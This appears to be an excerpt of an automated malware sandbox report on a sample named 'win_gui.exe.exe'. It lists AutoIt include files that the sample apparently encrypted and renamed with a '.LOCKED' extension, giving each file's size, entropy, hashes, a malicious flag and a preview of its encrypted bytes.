                                Preview:..! vq..[\....:.*{=(.@.*...S.#..9.HO.i..]m........?....p.+2q.v.b.9H...L..4....I|.aY_........'.&.8..4.y...p.....M........{.K..af....-.W......O..z-.q..;....6..-.A.[4..+....F...,.2a........g...R...s..:J?..l............"zg..|..N...H..[~..S.I...}......%%vp...4......6.}.h..Z......e....../p..L..G.AP..*.Bl.Jb:B...A...D-.Q.....aB..A.......9V....-..D5.I....d..&.0.J.~FF~...+6....e.3=.n..5..A...ypF...An.4.uj..~'.:.Z.gG&..f.....!..../"9B.._dD...*....Ca...0...R......9}..W6....qC-......G^Y_.+oG.^i.MPr[nf=I.yz.B.U.6..Ma.kB.y{....BZ.[.Hr.E.:Z..!....|........`m.zu..[g4h.1....>....t..]..H....12....7..OY.~.Ma.dgY....]0......r..C.4...,......._R`.zjndOq?.....j*.....}.C.).i........n..fY2.{!.......t....*xy..=.g...*...2.&.l....3.b.d..o..(.N.5/....-.....;.....?..8`b........@....J../..j...j+.....k...Yj..../..\.H0X.....E...T..vN.7hL.<..N..."p.$k....~...Q.O.:dYW..A..4V...#e1L,8.....1.a......l..P$A.N...G..e.dX..p...ygE..Oy,..\n..z...i..z.oLV......].z...Ws.J....z.Bu.j.

                                C:\Program Files (x86)\autoit3\Include\WinAPIRes.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38984
                                Entropy (8bit):7.995551107013911
                                Encrypted:true
                                SSDEEP:768:FAb2yKLIdr3OMqjIiCXxL7JfKtq14bOgDP9Be:3LKreMqj2xL5Eq6btDPu
                                MD5:C24155123912F79D83770B34DC14F774
                                SHA1:7E7FF4C6E5D56F127848BFE34F6DFF49B307E626
                                SHA-256:626AE14D43F7D4659BA5456AB4EA79625498265B18336AE9AF9DAF2567C5703E
                                SHA-512:F4FCCF9E7C0E5C31F85124F2B922CFD7BFD7BF52D0897620A2A5450AB6F9338CAAA94E94F0AE6107E0D6343539CDBE7F9D3B3E65E6FB06C54170D95CE438D423
                                Malicious:true
                                Preview:.,....l............sy-.oRs3.X?...N..U.M....?^..>..i....c"....:;0._\.M.-..2.c.@...v)U.Sa.[+.......j.....&.V!.E...Uw$.....h.<+.h.n..u}.p.H.A.L....V....1.jA.k.B.p*..%C.]..7. ....~)..9.pL..C.5...V.......%..s.x....=....A..c....wEyA.....B.....3...D.<%.D4.u.a.n.u\...m.7d7z... rr.l..Y...M....:.p.9...7....Y.I[2.l.J.'w.H*..Z.'.ll#..1.*.6.I~-T....KY.D.$[f.(.I...j..G...C..v.T.0.!.O[+FG.9p..k..H;.N/d.....s.Qm..hA.:T.r.C......'.._x..r.r=...wK.K@..QfR.;,..qf.........(L:.gH.V......._...o..Ouj.M...3&gF......H..|.Y:..#!I}..m....SM.2.......[../..C..W...O^...E....k.r..T.....I-L.a... .|........o)..a..W[..g......;....(..o..v{)~W'x./a..4vQ...........-..K..!...^vN.../8!...p..C.o7.d...'N....o..........2..u].L.Au3.a.C../LT.*.AYm....}yy==!.A...]!x.(..3.X.u...nvG.. ...N.....{1....R.-XE.......b`e...j...........D.).62.<B0...H..u..t..(......N..CUf.^2....5H.YXn{..O.r0....1...f4..w..s......y^.r..z.v..fe.Z.1 .S><...r.....Od......q.............)@.........{:.m.d.

                                C:\Program Files (x86)\autoit3\Include\WinAPIShPath.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45110
                                Entropy (8bit):7.99567981422741
                                Encrypted:true
                                SSDEEP:768:4g4PTMQ9KM3DkxVjidsoRarLFOAlIeEWw1f1mCLmoYgwx1Osykl90+q:4Z/97DqUdsoRGLoASeUx1xmZg61Osyke
                                MD5:FD29DCBE15C9E332B676FFCCDD174B7B
                                SHA1:33652E8C84860F98B1E3B5C853E6ED38DDB056FC
                                SHA-256:9D8AC44E2DD6BD1E979D2E2B2AF418B982F2E7F537259FBE7909302DE43A6FCC
                                SHA-512:ADF690D0D4A7E952C4131891ABEF87E770ECC7B8903A9E50DA4C821464BF9FC153192847789182065C74AD6042B9F0E4CAB74F8D54CDAB03DDA5E5CE2FE71442
                                Malicious:true
                                Preview:.ts....F..:.!...V...."SXX."...9|......./....s_S..J...`.....+....w.3}..M..74...C2.K..U..^.._J.u....2.l..x..K...N..j.|t..G..=^o.R7H.S...F.%.....I...!.....7bid......oW..h...l...%`..0.y.C6z..i.{..."..{...O.W..5~..;...0......A......"..%h.'...x..J...']T...e.w...s..3..;.... ....)?...p...]!......9....../.q.....m...Bi.3Yc......S..b..O.d..o...z.2..A..z$...`.....2t..qO.d...f....}".cNQr.Hs....$Z.'D......:z....m.!....z@$._..!...g.........F.D.K...G.,(.@ .gpXc..}.x%`.....o...[$%.q........s........P.9.....f.X.W.<.l..9/D.....`:...b.w.a.[|.^..C.\..{F..].k...">69w.!3E..}...9......~...,|..el....(#/...b`[..!.R.,.a\..FM.^...+_...b)......4..zl.#kR|(,.u.q....8.;..cL..A.6,S.e.<.H......zA/."....:..452..[?.w.G.AT...<.Zu....;I...X...2...A..,....q[6.3..L..w.O|7.0t.c. .i.....j...?....{..t........<.V..[}.....MR-...I.<G.....<......6[..V+...C.."..;+..+K.."..~v..pm.5...1..`..,.3....*.+...SM..<.......b.j.U.l..U.r...Dx{.7......-..WK.{..RF..SM..,u.12.z.._...C..X....q..

                                C:\Program Files (x86)\autoit3\Include\WinAPIShellEx.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):43041
                                Entropy (8bit):7.996224052476002
                                Encrypted:true
                                SSDEEP:768:+EharlTbhn0CpXecGIU3hEYKKjQujfYhg6vm03Fy3GAzBFXHbdKH6MynJg2mC:bWBn0IhOhE1kQujfYbvVFQ1FXxsmg2h
                                MD5:7D1665A1790A327D64F06619B7587CAE
                                SHA1:D5E2D7E20B3F2CB3A10C6E1493F43515DCB686CD
                                SHA-256:2EE479729E4780F1C4E78D5E737F3AF391A39A44F853CEDFF516156AC2AE906F
                                SHA-512:ECD9963E19E44C17DF83C4A3551A4B9D6CEBE983E8558C550B9FF12D6208A3E1AED2A8806C748939D4E61AA8E245613C48197CD14DAB2BAF1EA8B5CF569BF9D9
                                Malicious:true
                                Preview:....)6....|.6..nk:)v)...|....N...A.3.;..y........#:....7.v...Mw.*..P..7...sZh.ZM<...._.....ol.I........K......YA2}....q..R+@hu.{HA..n0*[..!R....W+ x...........I...=Vl....;p1.=.../c...~I..5)S.M...Nq.%SRN.?.|...S.U..W.w..=c:.9..<..vT....X.:..9.[9....<fzV..u..&..7.%UXx..!9V.P..|4.+.i....^...)L....mUL..%.AT.I.....b.W....).F...7mp..A...3.I.._......G..y.m......X......q..=...pV.U..{.O.....#c.\ki..Dv....s...../..!....w..c.....6.t.U.@.+...=z...$.1..h3..&..\....b.J...J......<.zq............O..C..s..g.ErUfK...........>A.H.e....a.......k......F..Il.....5.-'.&J..?.+3.L..:KN.y.L4bD1b..0..>..D...O.9.S.Btu.^#>...S>."...^ek...h..no....p..d.H}%..._R0_......=y..t.J1c.......`.L;..),.3#.|..?2.4`.%......G.K.eR..Ow....5dv...Cr..r%.....5.. ..g..M.}.......pMx..o....."#........:f....!W..K}......^...bO<...F....@..LN.I.En.......y.D7Vb..J(>.......@..=..Ogh.%..w$...L(\E...z"...`.(U..;`"..<s0..3.\.=.=..4.....y..cQ.gd...%ZrE?..J.....;.}..).X.....U.a.i..)...}Fi ~.

                                C:\Program Files (x86)\autoit3\Include\WinAPISys.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):78202
                                Entropy (8bit):7.997756107228158
                                Encrypted:true
                                SSDEEP:1536:FMh8tqY2qLOzI4hAd5u5rd0PPKK4/1pC2ZDo1U9SqTDlR:iTY2y2IqKe00tpvDrDlR
                                MD5:24233943B7B8B1FD94D72A6152057C73
                                SHA1:586C1D0A1F74D22A202E28D8798D936198D4C2D2
                                SHA-256:10AC3A1641BC41D16184766C45F7A989021614757FA546349E96D9B0EB79E847
                                SHA-512:CB83CBF78340EF759C94B09491D2CF3C08106C738922C4B05D4D340B58DBD3EE4E96B534177225516C7D0D9D1A5AEB6A6F4C1AC1C56388F2148DC826184648E8
                                Malicious:true
                                Preview:..Qk:q.$..D.....r..*[..7..5.~......Uq.......[j...:+7....x..f..F.s ......1.9(.-.l[Hm..H.G..jj5..`..,A..'.........+a..-.....)._...-..CCp.........YFO....E...S..........`n.........2...8....2..3=.t.....spg..7vF...&.s...Ik.:..{. ._.S...R..L....-m.j..w....+z...~*..K.y.m'..!;._|h.Cl..L3.4.F..N.+..........K.z-.q..L.....DF..<._.!...A.....i.^G..H.>*m..n,......H.g%....N.....0.F.oa)).i1.e.....V..Y.Z>..(\ha>I......r.8.....8.s1X)*w.b.ro.J.. .l..p...............X.N.j.9X..`.#..X.)o....(F...q.k>5. .^.......~1....Bw.....;....%.a..9.F1w.y....a......1.C....:?.J..R...q2....+o.+.V...N~9.D,.O.....R.|..Dh3{4.T2..|.hK1|.k..?...\-}9.A~7....q........`...#.....$...".Zv....6~............QcO.f..{=]<^q.l.#1...:"...Ke.......N..:5nh..(t!M...[\....f..Z.y......./..:rb.R...j.a.....ozJFW..}O|.0Bx.h...S...B.3.|....ZH.DN..-...fEs!....`.c..9(....).yu....R......8.Q..!....[w..3...m..#...k?...i......^gp.DM.X...l.~G....'>.....]./.I.dH..7n.P;.,F*.%dl......\.&.;0RU..7N5...(+

                                C:\Program Files (x86)\autoit3\Include\WinAPISysInternals.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28699
                                Entropy (8bit):7.993136863460101
                                Encrypted:true
                                SSDEEP:768:e4GxgW0PRBlfN7X5ycjdVKpYCuSmb8+vufXrtJ:et05d7F2pYCu6/f
                                MD5:F932A11B4954C664991767791003591B
                                SHA1:CB0258F139F1BC7489D0202BC8841D4E5BD7A230
                                SHA-256:51E2CB97B17955DF7F613821BABED7858E3A46C7CF64DF36D9C7E657A72D7F25
                                SHA-512:E47EF7BF7DCAEEACC27E76C2603C2F6AEABF9D18F54225C0480344BFA259C93393980547F9B83921C946E6D6A6A057DFE3C071AF6A4AFC630C032C3F7D7E9059
                                Malicious:true
                                Preview:-.r.-..-%47....]#.....h)ij......p6.b@<........t....r..&..5.....Y4aN9...v.%.bV....P..z......@ ..s~8^..........r?w..=....F.k..X..*.K!....d.4.....<.H.l.s.j.:......?........3....t`......G...`....1.fE..M@..(...M!...U.........,...g.>4.6Y`..!]..m.N^.&....;..WT..9VHl%.?..5@.d......'...~.[ .F.....P6.....EX..e.......D..!8>.......8l.j.i.~.a....@.|...[........)1....D....T.~..2.m....+..9...g..t.\.NH.W.&.y...g...C.t.0..@......Z.m.]<....)...O.....b.F.M.<........X.n..I...f.OA....+...eO.>,5.........]..}y.40......$.%v.*.......-.9...w.s,.V.~.U..h....CC./.+.l.<....U.............b..D.ju@.T..;L.x+.i....b:.......m....... .6#..T..}S..<w..1...)y.q..O'^.O?...;.&7...T$.P...3+..eg.+.!...Y..T../.].?.......K8.n...#}...Q..".z.BG.o'A...._..........\.R..@......F..F1[....:...#.P......Qg...jD3..UVB\......7...9].)........o..pqj.........5...u...w....)...&Z.%#....v./..........}U...[..e...."8.`......v.)...).N\m<..r`.9.........+[n^:d=..?rCT9.............c..]..6.o.\.....

                                C:\Program Files (x86)\autoit3\Include\WinAPISysWin.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):59065
                                Entropy (8bit):7.997113050116395
                                Encrypted:true
                                SSDEEP:1536:PqLlcryUBAjN2zAsO9Iv4duCmyKlKHjrQGQqlCi:yGBAjoA5ev9kT1FYi
                                MD5:E750745D0B4B11DAA75565E42843A8E1
                                SHA1:C616D2DE9A3A4D1B655AFB3BFC0941B131E28B04
                                SHA-256:B2B185D64D526199527FD8AB802642A63639755B0EAAF0A4EC11AC4F167BBF9B
                                SHA-512:04A4B80F02B5214846E8D4E24F978C2248D8C958872102DA537C105A6611B392F4BABD8B2BB502EFF35ADD6FC195C1831C282738AF43BC369BE1BF1C099377F2
                                Malicious:true
                                Preview:I.u..[\.eVi0m...23..)B.....G...e...$...~...5..~.C..S6.4.M..L.UF..S..N@C...1.....}Z....Q....eQ....dk..[|.c&.."P}..'.2.%u...q.T...(z.D.....qr.t._.....yuY.|.y.cD.-q..<...T...HD@nM.h4.]....{&@&.5]...............90}.U.:<VUaI..G.v4^A.N....K..L.u.[.F..}.{..(..p}=.w..2.......C.........%...(0.;....m..i}.%..Ym...y.6.Em...F.M....C....b_.V....7_POb...?..............?..."2..1^a...~.....w.`.~".e...p4Xr%.q...9..........6.~n.....j.>.......O2h..i.....)E.p.....M...{.y.".....:.`..lT5ow..c~l.dl.].....>_Fb.K....b.....F1...)..:)b..U.`{.a...R..<.7.bZ....u/.!....Z#..-..c.......`......#n......`.X..yo.....%...M...~.ea....F.S.|..X.D...:...x(}.xv..:.r.d..E.C.B.:.0..}G..Hq....j....0..k...#!ET..b.q..Uo9...i6._.x......t.-.F.F.Y..u.YP....z.bH....,......p2|.2.....cNH....<..0.C...(/....h.....3......Q......&D".".k.....X[.\Wp...n.........5........N.D.........h..~..?6"!1.....}...f76l...._./M^J...?.8.I.X.....).....~:..3.....W../..(a.|..8P5.f........M%.i#iH.

                                C:\Program Files (x86)\autoit3\Include\WinAPITheme.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):42453
                                Entropy (8bit):7.995573747932359
                                Encrypted:true
                                SSDEEP:768:HAqdbccge+9bPxbsBtukUD2Wqbwp+8BndMJaGzhl+0xXZUL1YoJjCNLtNso6+:gSAFzbPxsrnUD2hbwnnG1LwYoJyDJ
                                MD5:EB2A78AAF01CA6C1A58CA8B0916B926E
                                SHA1:CE8E82E50839F354715631913199E19A49BA4B2B
                                SHA-256:53B56BBB778F79797E8582D924944F8C50702837BA25CC92ACC7FCFCFCA6EA97
                                SHA-512:4858520683108887D0412FEFCA6E4429B918956C15D61A85A68EF50725CB09C5B6DA2078BF30F3B2515D2DAD24D5468CAD1337B3A99E48B411E9D9AC37F45F9F
                                Malicious:true
                                Preview:....V...;..&H..q.v.35..*L..J..J.y.W..Ni...;...2Y.?]./..I .d.U7%.R..QR xV~...!_%..7.........S=.bg?...3..T...D8...9.w}r..>n.}.LqV.aG......YtR...V..8.yL.....?rq..~.jZ.$@..:..&.....b.q...6r..t."\..9.9...T.<+z#.#..jF..M...(...}f..d...r^`6.x.v<E.d..2...V.+..$...../.E|FkFY..;.....".?..p......k}.t...k....'.5Px..e.gH..H..Vz....#'\L.....Zm,....|Y.\..^[...V.q..;.\i.e....>..N.@.5l.sR.S.pw}./.......P.?sl.. .:..._..^X&kQ_&........H....Q.9g......Fg...UjH.J....q.)8x.^..0.9........p.Q..h.j..?.+................a.hC3.>....5.Qw..x#W/W.2...~....._#..W..d...pRlI'.~M..M.=...6........kU.~..K.I`%...........V..n.......N..*...]...-.v<...c.0...o.#.>.6..".D^]b.Ib.'....EW..)..<.A.1.Di.t.0.%l.;....-1.!c.v... X7..(..=.7...a.L~.Ul...._6u.......=.=x...~z...$t...r_.C....k.....d.l..\r..+...dD.&...%.;<.GU'....e.$.....f.H.Z..9..S..@...;.nT.Sg.BU.-.17.C.gH....B......a.....6.P...9Q`f..|.x.....1.`\}F..h...3r./|^.0..%...'.ZhTZ.EJxqnn....CK$`#....2..v.>..?........bt...nH./M.{T._.C~/

                                C:\Program Files (x86)\autoit3\Include\WinAPIlangConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8925
                                Entropy (8bit):7.978752689949959
                                Encrypted:false
                                SSDEEP:192:1/KyNwA/nAPkIMPSDFpKvOqgJY2oW50xrStPolCPP+VO7:DNikKFwvpg10xrc1P+VO7
                                MD5:EB7614060CE1E4E9100B357FD9C90347
                                SHA1:01CF4F11C57724808AE112CD3729EB50A7F34A1E
                                SHA-256:9116679FADEA7CB892D1210C6CFAA97971C928C74539C7DA0143A04B734B7B54
                                SHA-512:97B395B4E158D77DA4169F0FC70B55F18E7CEB253D9C1D420062B43DC87AE7ADED970A4E04486ADB80659FBD7096B563996C9FA0D74AA0054E7946D200F68949
                                Malicious:false
                                Preview:..(..".E.QP........71.t..r.............n....g-..0B..~.Y..Kxf*..L.i.DL..N.S......Uq...'...ZI..Y...S...A.;.DM.*.%TK..........g...,.xA.o.g.m....3.p..C....N....$.K<.-;fi~H..h.8E!..kH...N.4#d.k.....V...G..S.x..qw....m....h..%FR~(...$6...............>.....%p.i7....?.:).8..F,......j..n.O...h......m.."b.$&'S...$..k..v.ZL$W..g.W.."1,....R..G.&.\0M$}..g...R.N.<....Jc.Q..C ..Y..6....R....[.$z..._.............E(.i.t...H..Ak.'..Rk...D...e:.6.E:...~....C..;.;.....@.1.......NS.W..=....gw.C.CY]>f..6.....cr..+......Dq.E....$9 d..7"..:.q..;.s.P...Na...NMQy2..V.>.....6h.....^.Ew-.!..d..J...5G....S"o..K.YPT.fP...B.Pv.7z.D..t.=.....4i!nK..l..^...].-..\l..$0.?j6....Bl..X...97.O..4.|....W\....Lu<J......;.......n)]|.. w.^SRD..s.a.`':... ..Zs9q...A.)..,.2*.{|.^.\L..v....R.......X....P7k~.?.^pt.Ih.IFf.......;..h.j..KPj...t..XX..H.N..k.W.....P..T...u.d0*j(k.I.......*...rZ&/C..Z.KS..8.@..q.....x...).?O...O.z.y..8..R.7C8m.j.&.mjD.....8%.....b.~IK...g../..Z...

                                C:\Program Files (x86)\autoit3\Include\WinAPIsysinfoConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9626
                                Entropy (8bit):7.9858070233296665
                                Encrypted:false
                                SSDEEP:192:op4QZRQ3O6GiXHHVMmdyM/c+Tg052gu3kvp0JWc66yoySgNT8lZ8m1+VOG:oWQfQ3O6GCVMQ5BD2gu3+0JO3HDYlZ8h
                                MD5:196C668F69ECA312250AC487819849D3
                                SHA1:30548B6F7948BE8F02A1A8DD5B1F3698642F839E
                                SHA-256:5B12AFE011E8E02D42DBF27B02D5042C35C05D175FCB7EF5EB6537A367ADB04E
                                SHA-512:0576B46B84102FBC778C008CF7778BA6B8B58FBE8D856B1CD43F6D79C621753B5EDEF8A4653E0B8731B4B29736BFD5CBD93E9A6C436F10013296FBC24B692B83
                                Malicious:false
                                Preview:..m..:..dksU..#~. .....'.1q..INl.$...2%.....2...aD#.:......9....P.~Zz3;....Tx&...w..X.fM. qhp,..)8......E5ee..".n.......@..w.t3........:.@E.....\...X....+0..Gg..py.om$......s...V>]W.L+N..C....V].U...JAU.g]\3'..m.Q.8.D...&...#.1.{.@{...........\+q.:O!..C.~...0.x |\.#...>.o....M.._..EO8.2.2.r..r..|D.(}=.CIt...T.....=z..;..=..sb.L.....9d....9.].;...r.S*.."D.`..by.....H(....c-......G[....w..].>.Pb.s.o..a.=..|Y....r!|.\.I:...[..i..K..5H...}.c......Jo..|SR..y..4.....,.!.J.?.Q.d.f.q.....o*..r+.ha..Hq..^W.G.\2.@C.+a(....q.4.^~..-.]o..N|oF..(.E..1.....;1.H..1..CP.k......4..bB..V.........mo..H.4..y/.o...-.mc...f.R-....GRh...~..+....K_.j..)7.....n-..\.....u#\/.$RJ.....LU)=,..W....M.,O.R..o..k9!..+...a..C?...Y....X.lz....'.f5E.......].....|C.LYP-).>............W....C........E.0........7....]..h..|..8:.$lx.._s#.uTS...~...A..5...^h..G4P./.L]..9..~.O(3...S.P........px...y:fRp.......u.l {H..a..:.-.;.>hi..o.1H.\.M%...@) 8...cRc_.gD.}......1ej

                                C:\Program Files (x86)\autoit3\Include\WinAPIvkeysConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6867
                                Entropy (8bit):7.970007115002978
                                Encrypted:false
                                SSDEEP:96:DTq4EKb2SGL39Pik6p1AMB9kmWLdN+WvPj1ktYeCmCrt7B0IwM7E1k6WEqydevul:D1d29TBuAK9kRRtPGtYb/rZo7Wg+VORl
                                MD5:CCA8CAB2153A910A214B833891E16603
                                SHA1:0C5605265215AEEBA3ED785F7DE69B300DD1AFE9
                                SHA-256:272717E9239CE897D4D6225AB0BBCD7819325641A9EDE35F74BC1D78D5917595
                                SHA-512:6D422D95A93FE2E031500BA6E3F7331234E4EB401F0603F96647B30C72EDCE367B9A6BAEE09FBB22FC38778F38FB4DB6376D0E254682F1A7F98949DF9D8989D9
                                Malicious:false
                                Preview:..._....XT5..:......B.$..Q?..\.{~.@'..-@F.i.....l.r..a.gy... ./.Ka7........Z.-G..:?..r.=..:...j.P...7.3c.o@.7.zq.;..F.GG&<..}.['.......#.H .7...~...nyn...E...3.......k..j....-.B7...M.;.C.w./.|.Cqx......[...d..;.....V..S.ek.y'.??ro...L....\...h.?._.Y...w...N9....v`.{...!..g._...e<9.n....._h......"...4.&....km..k;.x.......q..>a...o..C..F".....0.r.~..k^X.,..."V...4...h.T.........6...$.0..YC.........SM..m.U.Y...D8...&.......]AX(.......tD..Kc.um....A..U..(.aLG{.....g.^.61...n.J..1...^.......M..|..q..aDIx./.v-*.....m......:=N..[..y.a..'.....&2...;F5.n...sh...0iSP....*....&.\(-.$..t.K......q.r..c.].!.....D...o...u.BF.vf}.<9...N{....Z^{3)..8.....R..../>....L>.0.T.|^.%...O.Vq=...d.......8...2.v.......y.r.mu]V.BG?.....H..u.[..'&..jnX5.5.......I..d.{.t..E&.)..6.m..u@$.A.F..2).4..XM6.J.......z..w\|..X.&........2...+\.2B..[j.WB%..f........Z.........l...z.`..s........0~>[....4.23.H.....;2.xI@cc...O..,.Ds...]......Ux.6..T.A ..!..W...0R...i3....>f..

                                C:\Program Files (x86)\autoit3\Include\WinNet.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47388
                                Entropy (8bit):7.995759484423379
                                Encrypted:true
                                SSDEEP:768:RfmHq9KPPjKgkSaI1goEj5SeUaSMI3gIItJXiKUyDPz3AeKYWFnlgfiTAInAi:RfmHqEXOH68c/aSvI3UyP3AebmnKfiTP
                                MD5:F4A1F04E141A236DD5517134129D2728
                                SHA1:262552ED8696CB4D0E5DF2A34D5025D951F57485
                                SHA-256:F3575A69AF187C32139BECC5F512011EB30C983ED99EF671D1363F1436E8F112
                                SHA-512:BA239083898EFC8609FAEE6C0E532F23FB5E1733017F82F43BA9F4E59765463528128A90454258F3EC433810827EE1FC999B4977C598CDF2150A7EEDDDFC68B9
                                Malicious:true
                                Preview:twE....a..-|...?..=..F.w....l&.8....=r..m:.F7.{..T...,...R.k..@.....b.!..i..a..<.W).bB8.2..6.9..]_.W;..a.....=..O.].g..TZ..&}|,\.JZ..y.;).....c.u.#..o.....l.6u$|.....<.(....|.....!..Yk...%+..B....".....p..f...B...e..W,..'.PO$d..].V....^........9o...n....y..Y...........<Q_8...}..'i.2.p..gm.^.J.T.........\......^.. n.J.}.A.T_...S..B...#....t.;.sG....I.....&......&..Ei......5...Zd..=2R.|..3........,.l.h.%...u.)U.U..../.^..E...'..7....:iq.....kh6Uf.n-.........KHRX.&..4X/.......k!.......t%m......f...O5..d[%.6..w.A....r...dP.].........X...2H....+.%y...F1.2..6p.~.hg.;3L.".....&..".RI.....>|..:.`D..&...Iz. ..]....>..>d.g.27.......{|3^.vC...J..... .,.:..?W.{Vmn.du.M....f.....G.6..._...SO....=....c...z.....q.<.e.......9A1$..p}....X.L...... ..N.G...l\....n .|....4.,....@....#bli..|.w..B!@..n<|...j.xpe.B.?.P..YO..N..L...1...U|..D.U..v.c*/.H...7,..:G"..s..z.YU.mH ..W.<.`.;....'C..R..\.v....F.v....=Bx..P...?4.I...Z....v.b. .L}.._..w1.S.0.

                                C:\Program Files (x86)\autoit3\Include\WindowsConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34074
                                Entropy (8bit):7.994342177268926
                                Encrypted:true
                                SSDEEP:768:dF1MIgc0Fh1Gf1GlZLgCSO/JTVYySl/fd051wt4AHxDE:dbpR0Fh0olRlbJhYyS9K5ytVHa
                                MD5:A78E25DA6D44222A9B40499B3CA0A4A1
                                SHA1:F87DAD593ECC249FE35DF7D2F986D2626346B6FB
                                SHA-256:95715C03847D0E01335F1A40E5014368F08B49C013DF235CE2C694291A9D1C58
                                SHA-512:239632071AB2E366F4CC5E7B4E98058D530A648E0397AA9BB4685A61BE4E0B676A5BC185F157516CC23953D03CDF9E0D5564CC7728AB11FDF6E4B088B0C13671
                                Malicious:true
                                Preview:.c.:].g'....8&..0W.-.q.DM.o4...s..qb0#...23q.=m.c...DesHU...O.zZ..f.v./ .w..Z...]...B,Q....i.......&8.)...h%7lDpE..d.+....l..,...U.X...n.dV..g!..Na...5.r..K2).r.A$.....'.x>...w.ga.....#..{.&i.{4.N.....&V...V....Vx.o.......>S..f..6j....&$:...3..r.Y.(.Q`.}.........l7.E.u.........G...HTd......|.....c...?.R..|..Iw..../....r.$o.Z.p....R.?a).F1..t.._u(..Q`I......M../`.{.,.#.G.....b.B....4.rT..?.m....^e1....o.....#../......\bu.y.. .xM......M...<........O.VL_u..,....a...T~c..x-....x..u.B.t.y.f}.....H1..I.c-.../k..9..X.8.|..&y....... @...[...Mc.6...;gV....Ct...E.1....Y.].nm......*.y:.9.'G.>......Af$sU..b..#.6....*.2..}..x..`....y..D.*........KL......K.5..*.'......Xqt....L~.....<'...bk...!.....=.....I7.....M\jy.E>.`.B=.Z.k..)..~....=9.D..*.WE..T.....G9y45.*.-..t .e$i..W4wd.b..T....H..#.f.....0_..6........\...).0;.t....qu..].wa2..-..M..\.?D...)..W./YU....-.W...4M.o..o...CL........Al@;......&..]...+q..S.}....!.H..~...w.D...K r(~...x.s.R.Q..},...\1...~

                                C:\Program Files (x86)\autoit3\Include\WordConstants.au3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12276
                                Entropy (8bit):7.986194181461965
                                Encrypted:false
                                SSDEEP:192:Nnd+dMnS2azSZudYvoeBnsogju7jqRlar81gnAORwaxqzA32IgPAVrgSe/PVj+VN:Nnd+dKYSZud/aYjmjqj31gnACwSqFIgu
                                MD5:4938D51A79C1731F0362506F51A47158
                                SHA1:D975477E9824E957BB6076DCF52A771B4F783D5D
                                SHA-256:72797D6B41E53F380F56A98D38CD97E87E883DBA7869EB5C91FFAE204CB4F395
                                SHA-512:A78847F9F0DDE265356F448C9EB4D8516466EB4EBA519E5833292DE582F91B6C371E1C425FE663579E52E713F4B7BD264FE871D2DAE3C93B1C543160F5DED860
                                Malicious:false
                                Preview:U..C......h.....n..1...p..2.#...=.w....,.%..Fi....fms.2.T......f.M".+.7r.....b#j.l.4.5.s..?.Nd25...U.....Db..4.........D)..;1.>..w..?..t...S.U\m..&b.6......L|f.l.q.v.Y.W.`..r.;.#....@.."..d...,.-r..i_L..OB..7o8.;X..(.z.1.0..M..6...@.?._%...d.Y.o'D...k......R.*k."xD..H$..U.q...;....c.59+..Q./.k.4.....-.`....@.AqWP.v......I.....Q...4...I....=?T.-.1pbpG...KE.0...1...N..W..8g..5......c..4...b>..p....;...`.3.H...n....W.(g~D..x...V....5.C....V3..U............f:.-.9....@~..j.'O......e(f.U...i..e.b.#y...*.p.g....wBB.0l#.Q.._W.f,UU.....v....-7a.t.,7o....md.<.$M.> ....V..).c%..u2....V..c.i`o..h.t.|?.n../!...R.....z.....GMU%..e.GW..H.K..E.b.Q...vA...z.5.L............'....6A.!5j....4.0+..4.km).....]....2x+$....A..a:e.....8..=.j....i.h.+V..D....\.....1..Rw...!.t.4...C...G1'I.i .bH.W... ..Q...l. ..r.&...V9~sP;.1l..r.s.qB.z.u.H]...1...^.p9..f9=.P..P.aC..$c.o....l$.?;.:..o...sP..2...v..Z..R......Nl*...\..3b..jL...]...m..,.=,....o.....5ZN1~.......+:

                                C:\Program Files (x86)\autoit3\Include\_ReadMe_.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):822
                                Entropy (8bit):7.7309416836348674
